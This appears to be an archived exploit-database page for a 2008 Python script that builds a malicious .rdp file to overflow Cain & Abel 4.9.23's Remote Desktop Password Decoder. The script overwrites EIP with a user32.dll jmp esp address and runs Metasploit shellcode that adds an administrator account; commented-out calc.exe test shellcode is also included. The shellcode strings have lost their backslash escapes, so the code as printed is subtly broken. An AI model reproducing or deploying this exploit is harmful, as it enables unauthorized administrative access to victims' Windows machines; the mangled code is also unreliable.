Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit
# Published : 2008-12-03
# Author : Encrypt3d.M!nd
# Previous Title : PEiD <= 0.92 Malformed PE File Universal Buffer Overflow Exploit
# Next Title : RadAsm <= 2.2.1.5 (.RAP File) WindowCallProcA Pointer Hijack Exploit

#exploit.py
print ""
print "                 !R4Q!4N H4CK3R"
print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit"
print "By:Encrypt3d.M!nd"
print "encrypt3d.blogspot.com"
print "######################################################"
print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends"
print "This is exploit for my PoC"
print "Tested on:Windows Xp Sp3 Patched"
print "This exploit will Create File(.rdp) and when decoding"
print "The file with Cain(Remote Desktop Password Decoder)"
print "Will Add administrator user(user) with password(pass)"
print ""

# win32_adduser -  PASS=pass EXITFUNC=seh USER=user Size=232
Encoder=PexFnstenvSub http://metasploit.com

shellcode = "x2bxc9x83xe9xccxd9xeexd9x74x24xf4x5bx81x73x13x46"
shellcode+= "xcdx10x60x83xebxfcxe2xf4xbax25x54x60x46xcdx9bx25"
shellcode+= "x7ax46x6cx65x3exccxffxebx09xd5x9bx3fx66xccxfbx29"
shellcode+= "xcdxf9x9bx61xa8xfcxd0xf9xeax49xd0x14x41x0cxdax6d"
shellcode+= "x47x0fxfbx94x7dx99x34x64x33x28x9bx3fx62xccxfbx06"
shellcode+= "xcdxc1x5bxebx19xd1x11x8bxcdxd1x9bx61xadx44x4cx44"
shellcode+= "x42x0ex21xa0x22x46x50x50xc3x0dx68x6cxcdx8dx1cxeb"
shellcode+= "x36xd1xbdxebx2exc5xfbx69xcdx4dxa0x60x46xcdx9bx08"
shellcode+= "x7ax92x21x96x26x9bx99x98xc5x0dx6bx30x2ex3dx9ax64"
shellcode+= "x19xa5x88x9exccxc3x47x9fxa1xaex7dx04x68xa8x68x05"
shellcode+= "x66xe2x73x40x28xa8x64x40x33xbex75x12x66xb8x63x05"
shellcode+= "x34xedx60x01x35xbex30x4fx07x89x54x40x60xebx30x0e"
shellcode+= "x23xb9x30x0cx29xaex71x0cx21xbfx7fx15x36xedx51x04"
shellcode+= "x2bxa4x7ex09x35xb9x62x01x32xa2x62x13x66xb8x63x05"
shellcode+= "x34xedx3fx21x02x89x10x60";

# and if you want to test it..this shellcode will open calc.exe
#shellcode = "x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xb2"
#shellcode+= "xabx63x3dx83xebxfcxe2xf4x4ex43x27x3dxb2xabxe8x78"
#shellcode+= "x8ex20x1fx38xcaxaax8cxb6xfdxb3xe8x62x92xaax88x74"
#shellcode+= "x39x9fxe8x3cx5cx9axa3xa4x1ex2fxa3x49xb5x6axa9x30"
#shellcode+= "xb3x69x88xc9x89xffx47x39xc7x4exe8x62x96xaax88x5b"
#shellcode+= "x39xa7x28xb6xedxb7x62xd6x39xb7xe8x3cx59x22x3fx19"
#shellcode+= "xb6x68x52xfdxd6x20x23x0dx37x6bx1bx31x39xebx6fxb6"
#shellcode+= "xc2xb7xcexb6xdaxa3x88x34x39x2bxd3x3dxb2xabxe8x55"
#shellcode+= "x8exf4x52xcbxd2xfdxeaxc5x31x6bx18x6dxdax5bxe9x39"
#shellcode+= "xedxc3xfbxc3x38xa5x34xc2x55xc8x02x51xd1x85x06x45"
#shellcode+= "xd7xabx63x3d";

eip = "xB7x2Fx49x7E" #user32.dll jmp esp 0x7E492FB7

chars = "E"*8206
print "Bu!ld!ng 3xpl0!t....Pl3453 W4!t"
print ""
file = open('cain.rdp','w')
file.write (chars+eip+eip+"x90"*10+shellcode)
file.close()
print "D0NE!"

# www.Syue.com [2008-12-03]